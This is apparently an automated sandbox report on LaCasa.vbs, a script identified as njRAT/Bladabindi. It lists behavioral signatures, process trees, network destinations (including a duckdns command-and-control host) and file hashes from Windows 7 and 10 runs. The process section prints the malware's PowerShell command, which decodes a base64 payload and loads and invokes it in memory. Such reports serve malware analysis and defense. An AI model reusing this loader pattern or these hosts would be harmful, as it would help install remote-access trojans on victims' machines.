Analysis Overview
SHA256: 5f66c7336f8469a6ab349a3f0f3f7aca1b483f2f2a8b4ad71af79ff51a8aad6b
Threat Level: Known bad
The file LaCasa.vbs was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
Blocklisted process makes network request
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Analysis: static1
Detonation Overview
Reported: 2023-08-17 10:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2023-08-17 10:02
Reported: 2023-08-17 10:04
Platform: win7-20230712-en
Max time kernel: 117s
Max time network: 120s
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2292 wrote to memory of 2836 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LaCasa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.zjn4*●*☞#:▶sr∞*▲◀(fom4*●*☞#:▶w∞*▲◀(n4*●*☞#:▶47.05.3](∞ú((úø(@@*ú.](∞ú(94*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted: 2023-08-17 10:02
Reported: 2023-08-17 10:04
Platform: win10v2004-20230703-en
Max time kernel: 146s
Max time network: 149s
Signatures
njRAT/Bladabindi
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3192 set thread context of 4548 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LaCasa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.zjn4*●*☞#:▶sr∞*▲◀(fom4*●*☞#:▶w∞*▲◀(n4*●*☞#:▶47.05.3](∞ú((úø(@@*ú.](∞ú(94*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.22.238.8.in-addr.arpa | udp |
| RU | 91.213.50.74:80 | 91.213.50.74 | tcp |
| US | 8.8.8.8:53 | 74.50.213.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | njnjnjs.duckdns.org | udp |
| US | 154.12.254.215:35888 | njnjnjs.duckdns.org | tcp |
| US | 8.8.8.8:53 | 215.254.12.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a335pl53.cim.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |